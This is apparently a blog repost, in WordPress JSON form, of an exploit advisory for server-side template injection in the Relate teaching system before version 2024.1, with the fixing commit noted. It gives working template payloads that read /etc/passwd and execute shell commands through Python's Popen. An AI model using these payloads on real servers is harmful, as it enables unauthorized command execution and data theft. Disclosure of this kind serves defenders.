{"id":56426,"date":"2024-04-24T19:40:39","date_gmt":"2024-04-24T15:40:39","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/178251\/rltsbiet-sstiexec.txt"},"modified":"2024-04-24T19:40:39","modified_gmt":"2024-04-24T15:40:39","slug":"relate-learning-and-teaching-system-ssti-remote-code-execution","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/relate-learning-and-teaching-system-ssti-remote-code-execution\/","title":{"rendered":"Relate Learning And Teaching System SSTI \/ Remote Code Execution"},"content":{"rendered":"<p># Exploit Title: Relate Learning And Teaching system Version before 2024.1 SSTI(Batch-Issue Exam Tickets function) lead to RCE<br \/># Date: 24\/04\/2024<br \/># Exploit Author: kai6u<br \/># Vendor Homepage: https:\/\/github.com\/inducer\/<br \/># Software Link: https:\/\/github.com\/inducer\/relate<br \/># Affected Version:before 2024.1 (https:\/\/github.com\/inducer\/relate\/commit\/2fdbd4480a2d0a45c746639be244a61a0d4112b6)<br \/># Fixed Version:2024.1 (https:\/\/github.com\/inducer\/relate\/commit\/d9fa7dcb84b8e5a64ce78ced4f56cdd61c0d59aa)<br \/># Tested on: Ubuntu 22.04<br \/># Summary:<br \/>SSTI in Batch-Issue Exam Tickets function of Relate Learning And Teaching system<\/p>\n<p># Description:<br \/>* \u3010Prerequisite\u3011<br \/>* The attacker has stolen the privilege to issue exam tickets. For example, attacker is logged in as an course administrator.<\/p>\n<p>* SSTI is in the `Batch-Issue Exam Tickets` feature, which allows user to specify the format in which tickets are distributed and uses a Django (Jinja2) template internally.<\/p>\n<p>1) First, the attacker uses the Ticket Format feature to plant the following payload.<br \/>* Payload:<br \/>* `{{ &#8216;abc&#8217;.__class__.__base__.__subclasses__()[111].__subclasses__()[0].__subclasses__()[0](&#8216;\/etc\/passwd&#8217;).read() }}`<br \/>* Note that the subclasses index number in the payload depends on the python version, so it must be changed depending on the environment.<\/p>\n<p>2) Click an Issue Ticket including the above payload.<br \/>* Then you will see that the contents of the `\/etc\/passwd` file are output at the after Ticket Code block.<\/p>\n<p>3) Next, the attacker modifies the above payload to execute arbitrary commands by changing the subclasses index number to the number of popen.<br \/>* Payload:<br \/>* `{{ &#8216;abc&#8217;.__class__.__base__.__subclasses__()[210](&#8216;whoami&#8217;,shell=True,stdout=-1).communicate()[0].strip() }}`<\/p>\n<p>4) Click an Issue Ticket including the above payload.<\/p>\n<p>* If you check the results, you will see that `ubuntu` is displayed, which is the result of executing the whoami command.<br \/>* An attacker can use this feature to execute reverse shell.<\/p>\n<p># References<br \/>https:\/\/book.hacktricks.xyz\/v\/jp\/pentesting-web\/ssti-server-side-template-injection<\/p>\n","protected":false},"excerpt":{"rendered":"<p># Exploit Title: Relate Learning And Teaching system Version before 2024.1 SSTI(Batch-Issue Exam Tickets function) lead to RCE# Date: 24\/04\/2024# Exploit Author: kai6u# Vendor Homepage: https:\/\/github.com\/inducer\/# Software Link: https:\/\/github.com\/inducer\/relate# Affected Version:before 2024.1 (https:\/\/github.com\/inducer\/relate\/commit\/2fdbd4480a2d0a45c746639be244a61a0d4112b6)# Fixed Version:2024.1 (https:\/\/github.com\/inducer\/relate\/commit\/d9fa7dcb84b8e5a64ce78ced4f56cdd61c0d59aa)# Tested on: Ubuntu 22.04# Summary:SSTI in Batch-Issue Exam Tickets function of Relate Learning And Teaching system # Description:* \u3010Prerequisite\u3011* &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-56426","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/56426","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=56426"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/56426\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=56426"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=56426"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=56426"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}